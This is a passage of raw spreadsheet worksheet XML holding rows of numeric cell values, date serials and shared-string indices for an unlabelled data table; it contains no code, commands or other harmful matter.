        <v>93</v>
      </c>
      <c r="AY3">
        <v>3</v>
      </c>
      <c r="AZ3">
        <v>2</v>
      </c>
      <c r="BA3" t="s">
        <v>16728</v>
      </c>
      <c r="BB3" t="s">
        <v>14745</v>
      </c>
      <c r="BC3">
        <v>0</v>
      </c>
      <c r="BD3" t="s">
        <v>9512</v>
      </c>
    </row>
    <row r="4" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A4">
        <v>88</v>
      </c>
      <c r="B4" t="s">
        <v>73</v>
      </c>
      <c r="C4" t="s">
        <v>74</v>
      </c>
      <c r="D4" t="s">
        <v>75</v>
      </c>
      <c r="E4" t="s">
        <v>76</v>
      </c>
      <c r="F4" t="s">
        <v>77</v>
      </c>
      <c r="G4" s="1">
        <v>44341</v>
      </c>
      <c r="H4">
        <v>71</v>
      </c>
      <c r="I4">
        <v>71</v>
      </c>
      <c r="J4">
        <v>2</v>
      </c>
      <c r="K4">
        <v>3</v>
      </c>
      <c r="L4">
        <v>1</v>
      </c>
      <c r="M4">
        <v>1</v>
      </c>
      <c r="N4">
        <v>0</v>
      </c>
      <c r="O4">
        <v>0</v>
      </c>
      <c r="P4">
        <v>3</v>
      </c>
      <c r="Q4">
        <v>0</v>
      </c>
      <c r="R4">
        <v>0</v>
      </c>
      <c r="S4">
        <v>1</v>
      </c>
      <c r="T4">
        <v>2</v>
      </c>
      <c r="U4">
        <v>12000</v>
      </c>
      <c r="V4">
        <v>36000</v>
      </c>
      <c r="W4">
        <v>1500</v>
      </c>
      <c r="X4">
        <v>1500</v>
      </c>
      <c r="Y4">
        <v>0</v>
      </c>
      <c r="Z4">
        <v>0</v>
      </c>
      <c r="AA4">
        <v>1500</v>
      </c>
      <c r="AB4">
        <v>0</v>
      </c>
      <c r="AC4">
        <v>0</v>
      </c>
      <c r="AD4">
        <v>1</v>
      </c>
      <c r="AE4">
        <v>15000</v>
      </c>
      <c r="AF4" t="s">
        <v>78</v>
      </c>
      <c r="AG4">
        <v>59333</v>
      </c>
      <c r="AH4">
        <v>14</v>
      </c>
      <c r="AJ4">
        <v>206</v>
      </c>
      <c r="AK4" t="s">
        <v>79</v>
      </c>
      <c r="AL4" t="s">
        <v>80</v>
      </c>
      <c r="AM4" t="s">
        <v>81</v>
      </c>
      <c r="AN4" t="s">
        <v>82</v>
      </c>
      <c r="AO4">
        <v>2013</v>
      </c>
      <c r="AP4" t="s">
        <v>83</v>
      </c>
      <c r="AQ4" t="s">
        <v>84</v>
      </c>
      <c r="AR4" t="s">
        <v>85</v>
      </c>
      <c r="AS4" t="s">
        <v>71</v>
      </c>
      <c r="AT4" t="s">
        <v>86</v>
      </c>
      <c r="AU4">
        <v>26</v>
      </c>
      <c r="AV4">
        <v>1</v>
      </c>
      <c r="AW4">
        <v>63</v>
      </c>
      <c r="AX4">
        <v>266</v>
      </c>
      <c r="AY4">
        <v>2</v>
      </c>
      <c r="AZ4">
        <v>1</v>
      </c>
      <c r="BA4" t="s">
        <v>16604</v>
      </c>
      <c r="BB4" t="s">
        <v>14286</v>
      </c>
      <c r="BC4">
        <v>0</v>
      </c>
      <c r="BD4" t="s">
        <v>9518</v>
      </c>
    </row>
    <row r="5" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A5">
        <v>737</v>
      </c>
      <c r="B5" t="s">
        <v>87</v>
      </c>
      <c r="C5" t="s">
        <v>88</v>
      </c>
      <c r="D5" t="s">
        <v>89</v>
      </c>
      <c r="E5" t="s">
        <v>90</v>
      </c>
      <c r="F5" t="s">
        <v>91</v>
      </c>
      <c r="G5" s="1">
        <v>43971</v>
      </c>
      <c r="H5">
        <v>93</v>
      </c>
      <c r="I5">
        <v>93</v>
      </c>
      <c r="J5">
        <v>2</v>
      </c>
      <c r="K5">
        <v>4</v>
      </c>
      <c r="L5">
        <v>1</v>
      </c>
      <c r="M5">
        <v>0</v>
      </c>
      <c r="N5">
        <v>0</v>
      </c>
      <c r="O5">
        <v>0</v>
      </c>
      <c r="P5">
        <v>0</v>
      </c>
      <c r="Q5">
        <v>0</v>
      </c>
      <c r="R5">
        <v>0</v>
      </c>
      <c r="S5">
        <v>0</v>
      </c>
      <c r="T5">
        <v>0</v>
      </c>
      <c r="U5">
        <v>800000</v>
      </c>
      <c r="V5">
        <v>20000</v>
      </c>
      <c r="W5">
        <v>16000</v>
      </c>
      <c r="X5">
        <v>0</v>
      </c>
      <c r="Y5">
        <v>0</v>
      </c>
      <c r="Z5">
        <v>0</v>
      </c>
      <c r="AA5">
        <v>0</v>
      </c>
      <c r="AB5">
        <v>0</v>
      </c>
      <c r="AC5">
        <v>0</v>
      </c>
      <c r="AD5">
        <v>0</v>
      </c>
      <c r="AE5">
        <v>0</v>
      </c>
      <c r="AF5" t="s">
        <v>92</v>
      </c>
      <c r="AG5">
        <v>82171</v>
      </c>
      <c r="AH5">
        <v>17</v>
      </c>
      <c r="AJ5">
        <v>275</v>
      </c>
      <c r="AK5" t="s">
        <v>93</v>
      </c>
      <c r="AL5" t="s">
        <v>94</v>
      </c>
      <c r="AM5" t="s">
        <v>95</v>
      </c>
      <c r="AN5" t="s">
        <v>68</v>
      </c>
      <c r="AO5">
        <v>2009</v>
      </c>
      <c r="AP5" t="s">
        <v>96</v>
      </c>
      <c r="AQ5" t="s">
        <v>97</v>
      </c>
      <c r="AR5" t="s">
        <v>92</v>
      </c>
      <c r="AU5">
        <v>25</v>
      </c>
      <c r="AV5">
        <v>1</v>
      </c>
      <c r="AW5">
        <v>0</v>
      </c>
      <c r="AX5">
        <v>0</v>
      </c>
      <c r="AY5">
        <v>26</v>
      </c>
      <c r="AZ5">
        <v>29</v>
      </c>
      <c r="BA5" t="s">
        <v>16749</v>
      </c>
      <c r="BB5" t="s">
        <v>14814</v>
      </c>
      <c r="BC5" t="s">
        <v>10203</v>
      </c>
      <c r="BD5" t="s">
        <v>10204</v>
      </c>
    </row>
    <row r="6" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A6">
        <v>290</v>
      </c>
      <c r="B6" t="s">
        <v>98</v>
      </c>
      <c r="C6" t="s">
        <v>99</v>
      </c>
      <c r="D6" t="s">
        <v>100</v>
      </c>
      <c r="E6" t="s">
        <v>101</v>
      </c>
      <c r="F6" t="s">
        <v>102</v>
      </c>
      <c r="G6" s="1">
        <v>43892</v>
      </c>
      <c r="H6">
        <v>109</v>
      </c>
      <c r="I6">
        <v>109</v>
      </c>
      <c r="J6">
        <v>1</v>
      </c>
      <c r="K6">
        <v>1</v>
      </c>
      <c r="L6">
        <v>0</v>
      </c>
      <c r="M6">
        <v>0</v>
      </c>
      <c r="N6">
        <v>0</v>
      </c>
      <c r="O6">
        <v>0</v>
      </c>
      <c r="P6">
        <v>0</v>
      </c>
      <c r="Q6">
        <v>0</v>
      </c>
      <c r="R6">
        <v>0</v>
      </c>
      <c r="S6">
        <v>0</v>
      </c>
      <c r="T6">
        <v>1</v>
      </c>
      <c r="U6">
        <v>4000</v>
      </c>
      <c r="V6">
        <v>4000</v>
      </c>
      <c r="W6">
        <v>0</v>
      </c>
      <c r="X6">
        <v>0</v>
      </c>
      <c r="Y6">
        <v>0</v>
      </c>
      <c r="Z6">
        <v>0</v>
      </c>
      <c r="AA6">
        <v>0</v>
      </c>
      <c r="AB6">
        <v>0</v>
      </c>
      <c r="AC6">
        <v>0</v>
      </c>
      <c r="AD6">
        <v>0</v>
      </c>
      <c r="AE6">
        <v>2000</v>
      </c>
      <c r="AF6" t="s">
        <v>103</v>
      </c>
      <c r="AG6">
        <v>11630</v>
      </c>
      <c r="AH6">
        <v>12</v>
      </c>
      <c r="AJ6">
        <v>159</v>
      </c>
      <c r="AK6" t="s">
        <v>104</v>
      </c>
      <c r="AL6" t="s">
        <v>105</v>
      </c>
      <c r="AM6" t="s">
        <v>106</v>
      </c>
      <c r="AN6" t="s">
        <v>68</v>
      </c>
      <c r="AO6">
        <v>2009</v>
      </c>
      <c r="AP6" t="s">
        <v>107</v>
      </c>
      <c r="AQ6" t="s">
        <v>108</v>
      </c>
      <c r="AR6" t="s">
        <v>103</v>
      </c>
      <c r="AU6">
        <v>0</v>
      </c>
      <c r="AV6">
        <v>0</v>
      </c>
      <c r="AW6">
        <v>0</v>
      </c>
      <c r="AX6">
        <v>0</v>
      </c>
      <c r="AY6">
        <v>8</v>
      </c>
      <c r="AZ6">
        <v>3</v>
      </c>
      <c r="BA6" t="s">
        <v>16658</v>
      </c>
      <c r="BB6" t="s">
        <v>14458</v>
      </c>
      <c r="BC6" t="s">
        <v>10457</v>
      </c>
      <c r="BD6">
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A7">
        <v>159</v>
      </c>
      <c r="B7" t="s">
        <v>109</v>
      </c>
      <c r="C7" t="s">
        <v>99</v>
      </c>
      <c r="D7" t="s">
        <v>110</v>
      </c>
      <c r="E7" t="s">
        <v>111</v>
      </c>
      <c r="F7" t="s">
        <v>112</v>
      </c>
      <c r="G7" s="1">
        <v>43896</v>
      </c>
      <c r="H7">
        <v>125</v>
      </c>
      <c r="I7">
        <v>125</v>
      </c>
      <c r="J7">
        <v>2</v>
      </c>
      <c r="K7">
        <v>1</v>
      </c>
      <c r="L7">
        <v>0</v>
      </c>
      <c r="M7">
        <v>3</v>
      </c>
      <c r="N7">
        <v>0</v>
      </c>
      <c r="O7">
        <v>0</v>
      </c>
      <c r="P7">
        <v>0</v>
      </c>
      <c r="Q7">
        <v>0</v>
      </c>
      <c r="R7">
        <v>0</v>
      </c>
      <c r="S7">
        <v>0</v>
      </c>
      <c r="T7">
        <v>0</v>
      </c>
      <c r="U7">
        <v>1950000</v>
      </c>
      <c r="V7">
        <v>3000</v>
      </c>
      <c r="W7">
        <v>0</v>
      </c>
      <c r="X7">
        <v>3000</v>
      </c>
      <c r="Y7">
        <v>0</v>
      </c>
      <c r="Z7">
        <v>0</v>
      </c>
      <c r="AA7">
        <v>0</v>
      </c>
      <c r="AB7">
        <v>0</v>
      </c>
      <c r="AC7">
        <v>0</v>
      </c>
      <c r="AD7">
        <v>0</v>
      </c>
      <c r="AE7">
        <v>0</v>
      </c>
      <c r="AF7" t="s">
        <v>113</v>
      </c>
      <c r="AG7">
        <v>14450</v>
      </c>
      <c r="AH7">
        <v>12</v>
      </c>
      <c r="AJ7">
        <v>160</v>
      </c>
      <c r="AK7" t="s">
        <v>114</v>
      </c>
      <c r="AL7" t="s">
        <v>115</v>
      </c>
      <c r="AM7" t="s">
        <v>116</v>
      </c>
      <c r="AN7" t="s">
        <v>55</v>
      </c>
      <c r="AO7">
        <v>2009</v>
      </c>
      <c r="AP7">
        <v>2166607734</v>
      </c>
      <c r="AQ7" t="s">
        <v>117</v>
      </c>
      <c r="AR7" t="s">
        <v>118</v>
      </c>
      <c r="AS7" t="s">
        <v>71</v>
      </c>
      <c r="AT7" t="s">
        <v>58</v>
      </c>
      <c r="AU7">
        <v>26</v>
      </c>
      <c r="AV7">
        <v>0</v>
      </c>
      <c r="AW7">
        <v>30</v>
      </c>
      <c r="AX7">
        <v>0</v>
      </c>
      <c r="AY7">
        <v>40</v>
      </c>
      <c r="AZ7">
        <v>60</v>
      </c>
      <c r="BA7" t="s">
        <v>16622</v>
      </c>
      <c r="BB7" t="s">
        <v>14347</v>
      </c>
      <c r="BC7" t="s">
        <v>9525</v>
      </c>
      <c r="BD7" t="s">
        <v>9526</v>
      </c>
    </row>
    <row r="8" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A8">
        <v>306</v>
      </c>
      <c r="B8" t="s">
        <v>119</v>
      </c>
      <c r="C8" t="s">
        <v>74</v>
      </c>
      <c r="D8" t="s">
        <v>120</v>
      </c>
      <c r="E8" t="s">
        <v>121</v>
      </c>
      <c r="F8" t="s">
        <v>122</v>
      </c>
      <c r="G8" s="1">
        <v>44313</v>
      </c>
      <c r="H8">
        <v>142</v>
      </c>
      <c r="I8">
        <v>142</v>
      </c>
      <c r="J8">
        <v>1</v>
      </c>
      <c r="K8">
        <v>2</v>
      </c>
      <c r="L8">
        <v>2</v>
      </c>
      <c r="M8">
        <v>0</v>
      </c>
      <c r="N8">
        <v>0</v>
      </c>
      <c r="O8">
        <v>0</v>
      </c>
      <c r="P8">
        <v>4</v>
      </c>
      <c r="Q8">
        <v>2</v>
      </c>
      <c r="R8">
        <v>0</v>
      </c>
      <c r="S8">
        <v>0</v>
      </c>
      <c r="T8">
        <v>1</v>
      </c>
      <c r="U8">
        <v>3000</v>
      </c>
      <c r="V8">
        <v>4000</v>
      </c>
      <c r="W8">
        <v>4000</v>
      </c>
      <c r="X8">
        <v>0</v>
      </c>
      <c r="Y8">
        <v>0</v>
      </c>
      <c r="Z8">
        <v>0</v>
      </c>
      <c r="AA8">
        <v>8000</v>
      </c>
      <c r="AB8">
        <v>100</v>
      </c>
      <c r="AC8">
        <v>0</v>
      </c>
      <c r="AD8">
        <v>0</v>
      </c>
      <c r="AE8">
        <v>300000</v>
      </c>
      <c r="AF8" t="s">
        <v>123</v>
      </c>
      <c r="AG8">
        <v>59273</v>
      </c>
      <c r="AH8">
        <v>14</v>
      </c>
      <c r="AJ8">
        <v>204</v>
      </c>
      <c r="AK8" t="s">
        <v>124</v>
      </c>
      <c r="AL8" t="s">
        <v>125</v>
      </c>
      <c r="AM8" t="s">
        <v>126</v>
      </c>
      <c r="AN8" t="s">
        <v>55</v>
      </c>
      <c r="AO8">
        <v>2013</v>
      </c>
      <c r="AP8">
        <v>8156672577</v>
      </c>
      <c r="AQ8" t="s">
        <v>127</v>
      </c>
      <c r="AR8" t="s">
        <v>123</v>
      </c>
      <c r="AS8" t="s">
        <v>71</v>
      </c>
      <c r="AT8" t="s">
        <v>58</v>
      </c>
      <c r="AU8">
        <v>25</v>
      </c>
      <c r="AV8">
        <v>0</v>
      </c>
      <c r="AW8">
        <v>30</v>
      </c>
      <c r="AX8">
        <v>290</v>
      </c>
      <c r="AY8">
        <v>63</v>
      </c>
      <c r="AZ8">
        <v>124</v>
      </c>
      <c r="BA8" t="s">
        <v>16665</v>
      </c>
      <c r="BB8" t="s">
        <v>14471</v>
      </c>
      <c r="BC8">
        <v>0</v>
      </c>
      <c r="BD8" t="s">
        <v>9544</v>
      </c>
    </row>
    <row r="9" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A9">
        <v>452</v>
      </c>
      <c r="B9" t="s">
        <v>128</v>
      </c>
      <c r="C9" t="s">
        <v>129</v>
      </c>
      <c r="D9" t="s">
        <v>130</v>
      </c>
      <c r="E9" t="s">
        <v>131</v>
      </c>
      <c r="F9" t="s">
        <v>132</v>
      </c>
      <c r="G9" s="1">
        <v>43927</v>
      </c>
      <c r="H9">
        <v>150</v>
      </c>
      <c r="I9">
        <v>150</v>
      </c>
      <c r="J9">
        <v>0</v>
      </c>
      <c r="K9">
        <v>0</v>
      </c>
      <c r="L9">
        <v>0</v>
      </c>
      <c r="M9">
        <v>0</v>
      </c>
      <c r="N9">
        <v>0</v>
      </c>
      <c r="O9">
        <v>0</v>
      </c>
      <c r="P9">
        <v>0</v>
      </c>
      <c r="Q9">
        <v>0</v>
      </c>
      <c r="R9">
        <v>0</v>
      </c>
      <c r="S9">
        <v>0</v>
      </c>
      <c r="T9">
        <v>4</v>
      </c>
      <c r="U9">
        <v>0</v>
      </c>
      <c r="V9">
        <v>0</v>
      </c>
      <c r="W9">
        <v>0</v>
      </c>
      <c r="X9">
        <v>0</v>
      </c>
      <c r="Y9">
        <v>0</v>
      </c>
      <c r="Z9">
        <v>0</v>
      </c>
      <c r="AA9">
        <v>0</v>
      </c>
      <c r="AB9">
        <v>0</v>
      </c>
      <c r="AC9">
        <v>0</v>
      </c>
      <c r="AD9">
        <v>0</v>
      </c>
      <c r="AE9">
        <v>5000000</v>
      </c>
      <c r="AF9" t="s">
        <v>133</v>
      </c>
      <c r="AG9">
        <v>15560</v>
      </c>
      <c r="AH9">
        <v>11</v>
      </c>
      <c r="AJ9">
        <v>268</v>
      </c>
      <c r="AK9" t="s">
        <v>134</v>
      </c>
      <c r="AL9" t="s">
        <v>135</v>
      </c>
      <c r="AM9" t="s">
        <v>136</v>
      </c>
      <c r="AN9" t="s">
        <v>82</v>
      </c>
      <c r="AO9">
        <v>1993</v>
      </c>
      <c r="AP9" t="s">
        <v>137</v>
      </c>
      <c r="AQ9" t="s">
        <v>138</v>
      </c>
      <c r="AR9" t="s">
        <v>139</v>
      </c>
      <c r="AS9" t="s">
        <v>71</v>
      </c>
      <c r="AT9" t="s">
        <v>86</v>
      </c>
      <c r="AU9">
        <v>25</v>
      </c>
      <c r="AV9">
        <v>5</v>
      </c>
      <c r="AW9">
        <v>0</v>
      </c>
      <c r="AX9">
        <v>0</v>
      </c>
      <c r="AY9">
        <v>1428</v>
      </c>
      <c r="AZ9">
        <v>73</v>
      </c>
      <c r="BA9" t="s">
        <v>16695</v>
      </c>
      <c r="BB9" t="s">
        <v>14586</v>
      </c>
      <c r="BC9" t="s">
        <v>9540</v>
      </c>
      <c r="BD9" t="s">
        <v>9541</v>
      </c>
    </row>
    <row r="10" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A10">
        <v>343</v>
      </c>
      <c r="B10" t="s">
        <v>140</v>
      </c>
      <c r="C10" t="s">
        <v>99</v>
      </c>
      <c r="D10" t="s">
        <v>141</v>
      </c>
      <c r="E10" t="s">
        <v>142</v>
      </c>
      <c r="F10" t="s">
        <v>143</v>
      </c>
      <c r="G10" s="1">
        <v>43959</v>
      </c>
      <c r="H10">
        <v>192</v>
      </c>
      <c r="I10">
        <v>192</v>
      </c>
      <c r="J10">
        <v>3</v>
      </c>
      <c r="K10">
        <v>0</v>
      </c>
      <c r="L10">
        <v>0</v>
      </c>
      <c r="M10">
        <v>4</v>
      </c>
      <c r="N10">
        <v>0</v>
      </c>
      <c r="O10">
        <v>0</v>
      </c>
      <c r="P10">
        <v>0</v>
      </c>
      <c r="Q10">
        <v>0</v>
      </c>
      <c r="R10">
        <v>0</v>
      </c>
      <c r="S10">
        <v>0</v>
      </c>
      <c r="T10">
        <v>0</v>
      </c>
      <c r="U10">
        <v>500000</v>
      </c>
      <c r="V10">
        <v>0</v>
      </c>
      <c r="W10">
        <v>0</v>
      </c>
      <c r="X10">
        <v>52000</v>
      </c>
      <c r="Y10">
        <v>0</v>
      </c>
      <c r="Z10">
        <v>0</v>
      </c>
      <c r="AA10">
        <v>0</v>
      </c>
      <c r="AB10">
        <v>0</v>
      </c>
      <c r="AC10">
        <v>0</v>
      </c>
      <c r="AD10">
        <v>0</v>
      </c>
      <c r="AE10">
        <v>0</v>
      </c>
      <c r="AF10" t="s">
        <v>144</v>
      </c>
      <c r="AG10">
        <v>14440</v>
      </c>
      <c r="AH10">
        <v>12</v>
      </c>
      <c r="AJ10">
        <v>160</v>
      </c>
      <c r="AK10" t="s">
        <v>114</v>
      </c>
      <c r="AL10" t="s">
        <v>114</v>
      </c>
      <c r="AM10" t="s">
        <v>145</v>
      </c>
      <c r="AN10" t="s">
        <v>82</v>
      </c>
      <c r="AO10">
        <v>1995</v>
      </c>
      <c r="AP10" t="s">
        <v>146</v>
      </c>
      <c r="AQ10" t="s">
        <v>147</v>
      </c>
      <c r="AR10" t="s">
        <v>148</v>
      </c>
      <c r="AS10" t="s">
        <v>71</v>
      </c>
      <c r="AT10" t="s">
        <v>86</v>
      </c>
      <c r="AU10">
        <v>6</v>
      </c>
      <c r="AV10">
        <v>2</v>
      </c>
      <c r="AW10">
        <v>81</v>
      </c>
      <c r="AX10">
        <v>68</v>
      </c>
      <c r="AY10">
        <v>61</v>
      </c>
      <c r="AZ10">
        <v>80</v>
      </c>
      <c r="BA10" t="s">
        <v>17152</v>
      </c>
      <c r="BB10" t="s">
        <v>14496</v>
      </c>
      <c r="BC10" t="s">
        <v>10228</v>
      </c>
      <c r="BD10">
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A11">
        <v>181</v>
      </c>
      <c r="B11" t="s">
        <v>149</v>
      </c>
      <c r="C11" t="s">
        <v>99</v>
      </c>
      <c r="D11" t="s">
        <v>150</v>
      </c>
      <c r="E11" t="s">
        <v>142</v>
      </c>
      <c r="F11" t="s">
        <v>151</v>
      </c>
      <c r="G11" s="1">
        <v>43964</v>
      </c>
      <c r="H11">
        <v>217</v>
      </c>
      <c r="I11">
        <v>217</v>
      </c>
      <c r="J11">
        <v>2</v>
      </c>
      <c r="K11">
        <v>0</v>
      </c>
      <c r="L11">
        <v>2</v>
      </c>
      <c r="M11">
        <v>0</v>
      </c>
      <c r="N11">
        <v>0</v>
      </c>
      <c r="O11">
        <v>0</v>
      </c>
      <c r="P11">
        <v>0</v>
      </c>
      <c r="Q11">
        <v>0</v>
      </c>
      <c r="R11">
        <v>0</v>
      </c>
      <c r="S11">
        <v>1</v>
      </c>
      <c r="T11">
        <v>2</v>
      </c>
      <c r="U11">
        <v>100000</v>
      </c>
      <c r="V11">
        <v>0</v>
      </c>
      <c r="W11">
        <v>5000</v>
      </c>
      <c r="X11">
        <v>0</v>
      </c>
      <c r="Y11">
        <v>0</v>
      </c>
      <c r="Z11">
        <v>0</v>
      </c>
      <c r="AA11">
        <v>0</v>
      </c>
      <c r="AB11">
        <v>0</v>
      </c>
      <c r="AC11">
        <v>0</v>
      </c>
      <c r="AD11">
        <v>1</v>
      </c>
      <c r="AE11">
        <v>5000</v>
      </c>
      <c r="AF11" t="s">
        <v>152</v>
      </c>
      <c r="AG11">
        <v>14440</v>
      </c>
      <c r="AH11">
        <v>12</v>
      </c>
      <c r="AJ11">
        <v>160</v>
      </c>
      <c r="AK11" t="s">
        <v>114</v>
      </c>
      <c r="AL11" t="s">
        <v>114</v>
      </c>
      <c r="AM11" t="s">
        <v>153</v>
      </c>
      <c r="AN11" t="s">
        <v>55</v>
      </c>
      <c r="AO11">
        <v>2009</v>
      </c>
      <c r="AP11" t="s">
        <v>154</v>
      </c>
      <c r="AQ11" t="s">
        <v>155</v>
      </c>
      <c r="AR11" t="s">
        <v>152</v>
      </c>
      <c r="AU11">
        <v>24</v>
      </c>
      <c r="AV11">
        <v>0</v>
      </c>
      <c r="AW11">
        <v>0</v>
      </c>
      <c r="AX11">
        <v>0</v>
      </c>
      <c r="AY11">
        <v>23</v>
      </c>
      <c r="AZ11">
        <v>39</v>
      </c>
      <c r="BA11" t="s">
        <v>16629</v>
      </c>
      <c r="BB11" t="s">
        <v>14365</v>
      </c>
      <c r="BC11">
        <v>0</v>
      </c>
      <c r="BD11" t="s">
        <v>9548</v>
      </c>
    </row>
    <row r="12" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A12">
        <v>510</v>
      </c>
      <c r="B12" t="s">
        <v>156</v>
      </c>
      <c r="C12" t="s">
        <v>157</v>
      </c>
      <c r="D12" t="s">
        <v>158</v>
      </c>
      <c r="E12" t="s">
        <v>142</v>
      </c>
      <c r="F12" t="s">
        <v>159</v>
      </c>
      <c r="G12" s="1">
        <v>43857</v>
      </c>
      <c r="H12">
        <v>223</v>
      </c>
      <c r="I12">
        <v>223</v>
      </c>
      <c r="J12">
        <v>2</v>
      </c>
      <c r="K12">
        <v>0</v>
      </c>
      <c r="L12">
        <v>2</v>
      </c>
      <c r="M12">
        <v>0</v>
      </c>
      <c r="N12">
        <v>0</v>
      </c>
      <c r="O12">
        <v>0</v>
      </c>
      <c r="P12">
        <v>0</v>
      </c>
      <c r="Q12">
        <v>2</v>
      </c>
      <c r="R12">
        <v>2</v>
      </c>
      <c r="S12">
        <v>0</v>
      </c>
      <c r="T12">
        <v>0</v>
      </c>
      <c r="U12">
        <v>400000</v>
      </c>
      <c r="V12">
        <v>0</v>
      </c>
      <c r="W12">
        <v>15000</v>
      </c>
      <c r="X12">
        <v>0</v>
      </c>
      <c r="Y12">
        <v>0</v>
      </c>
      <c r="Z12">
        <v>0</v>
      </c>
      <c r="AA12">
        <v>0</v>
      </c>
      <c r="AB12">
        <v>200</v>
      </c>
      <c r="AC12">
        <v>3000</v>
      </c>
      <c r="AD12">
        <v>0</v>
      </c>
      <c r="AE12">
        <v>0</v>
      </c>
      <c r="AF12" t="s">
        <v>160</v>
      </c>
      <c r="AG12">
        <v>60293</v>
      </c>
      <c r="AH12">
        <v>16</v>
      </c>
      <c r="AJ12">
        <v>264</v>
      </c>
      <c r="AK12" t="s">
        <v>161</v>
      </c>
      <c r="AL12" t="s">
        <v>162</v>
      </c>
      <c r="AM12" t="s">
        <v>163</v>
      </c>
      <c r="AN12" t="s">
        <v>55</v>
      </c>
      <c r="AO12">
        <v>2018</v>
      </c>
      <c r="AP12" t="s">
        <v>164</v>
      </c>
      <c r="AQ12" t="s">
        <v>165</v>
      </c>
      <c r="AR12" t="s">
        <v>166</v>
      </c>
      <c r="AS12" t="s">
        <v>71</v>
      </c>
      <c r="AT12" t="s">
        <v>58</v>
      </c>
      <c r="AU12">
        <v>20</v>
      </c>
      <c r="AV12">
        <v>0</v>
      </c>
      <c r="AW12">
        <v>20</v>
      </c>
      <c r="AX12">
        <v>12</v>
      </c>
      <c r="AY12">
        <v>6</v>
      </c>
      <c r="AZ12">
        <v>5</v>
      </c>
      <c r="BA12" t="s">
        <v>16707</v>
      </c>
      <c r="BB12" t="s">
        <v>14631</v>
      </c>
      <c r="BC12">
        <v>0</v>
      </c>
      <c r="BD12" t="s">
        <v>9543</v>
      </c>
    </row>
    <row r="13" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A13">
        <v>423</v>
      </c>
      <c r="B13" t="s">
        <v>167</v>
      </c>
      <c r="C13" t="s">
        <v>168</v>
      </c>
      <c r="D13" t="s">
        <v>169</v>
      </c>
      <c r="E13" t="s">
        <v>170</v>
      </c>
      <c r="F13" t="s">
        <v>171</v>
      </c>
      <c r="G13" s="1">
        <v>43929</v>
      </c>
      <c r="H13">
        <v>264</v>
      </c>
      <c r="I13">
        <v>264</v>
      </c>
      <c r="J13">
        <v>6</v>
      </c>
      <c r="K13">
        <v>2</v>
      </c>
      <c r="L13">
        <v>1</v>
      </c>
      <c r="M13">
        <v>0</v>
      </c>
      <c r="N13">
        <v>0</v>
      </c>
      <c r="O13">
        <v>0</v>
      </c>
      <c r="P13">
        <v>0</v>
      </c>
      <c r="Q13">
        <v>5</v>
      </c>
      <c r="R13">
        <v>5</v>
      </c>
      <c r="S13">
        <v>0</v>
      </c>
      <c r="T13">
        <v>2</v>
      </c>
      <c r="U13">
        <v>300000</v>
      </c>
      <c r="V13">
        <v>300000</v>
      </c>
      <c r="W13">
        <v>3000</v>
      </c>
      <c r="X13">
        <v>0</v>
      </c>
      <c r="Y13">
        <v>0</v>
      </c>
      <c r="Z13">
        <v>0</v>
      </c>
      <c r="AA13">
        <v>0</v>
      </c>
      <c r="AB13">
        <v>0</v>
      </c>
      <c r="AC13">
        <v>50</v>
      </c>
      <c r="AD13">
        <v>0</v>
      </c>
      <c r="AE13">
        <v>300000</v>
      </c>
      <c r="AF13" t="s">
        <v>172</v>
      </c>
      <c r="AG13">
        <v>17510</v>
      </c>
      <c r="AH13">
        <v>13</v>
      </c>
      <c r="AJ13">
        <v>176</v>
      </c>
      <c r="AK13" t="s">
        <v>173</v>
      </c>
      <c r="AL13" t="s">
        <v>174</v>
      </c>
      <c r="AM13" t="s">
        <v>175</v>
      </c>
      <c r="AN13" t="s">
        <v>82</v>
      </c>
      <c r="AO13">
        <v>1989</v>
      </c>
      <c r="AP13" t="s">
        <v>176</v>
      </c>
      <c r="AQ13" t="s">
        <v>177</v>
      </c>
      <c r="AR13" t="s">
        <v>178</v>
      </c>
      <c r="AS13" t="s">
        <v>179</v>
      </c>
      <c r="AT13" t="s">
        <v>86</v>
      </c>
      <c r="AU13">
        <v>24</v>
      </c>
      <c r="AV13">
        <v>0</v>
      </c>
      <c r="AW13">
        <v>0</v>
      </c>
      <c r="AX13">
        <v>0</v>
      </c>
      <c r="AY13">
        <v>9</v>
      </c>
      <c r="AZ13">
        <v>0</v>
      </c>
      <c r="BA13" t="s">
        <v>17156</v>
      </c>
      <c r="BB13" t="s">
        <v>14560</v>
      </c>
      <c r="BC13" t="s">
        <v>10031</v>
      </c>
      <c r="BD13">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A14">
        <v>572</v>
      </c>
      <c r="B14" t="s">
        <v>180</v>
      </c>
      <c r="C14" t="s">
        <v>99</v>
      </c>
      <c r="D14" t="s">
        <v>181</v>
      </c>
      <c r="E14" t="s">
        <v>142</v>
      </c>
      <c r="F14" t="s">
        <v>182</v>
      </c>
      <c r="G14" s="1">
        <v>43868</v>
      </c>
      <c r="H14">
        <v>271</v>
      </c>
      <c r="I14">
        <v>271</v>
      </c>
      <c r="J14">
        <v>0</v>
      </c>
      <c r="K14">
        <v>1</v>
      </c>
      <c r="L14">
        <v>0</v>
      </c>
      <c r="M14">
        <v>0</v>
      </c>
      <c r="N14">
        <v>0</v>
      </c>
      <c r="O14">
        <v>0</v>
      </c>
      <c r="P14">
        <v>0</v>
      </c>
      <c r="Q14">
        <v>0</v>
      </c>
      <c r="R14">
        <v>0</v>
      </c>
      <c r="S14">
        <v>0</v>
      </c>
      <c r="T14">
        <v>0</v>
      </c>
      <c r="U14">
        <v>0</v>
      </c>
      <c r="V14">
        <v>500000</v>
      </c>
      <c r="W14">
        <v>0</v>
      </c>
      <c r="X14">
        <v>0</v>
      </c>
      <c r="Y14">
        <v>0</v>
      </c>
      <c r="Z14">
        <v>0</v>
      </c>
      <c r="AA14">
        <v>0</v>
      </c>
      <c r="AB14">
        <v>0</v>
      </c>
      <c r="AC14">
        <v>0</v>
      </c>
      <c r="AD14">
        <v>0</v>
      </c>
      <c r="AE14">
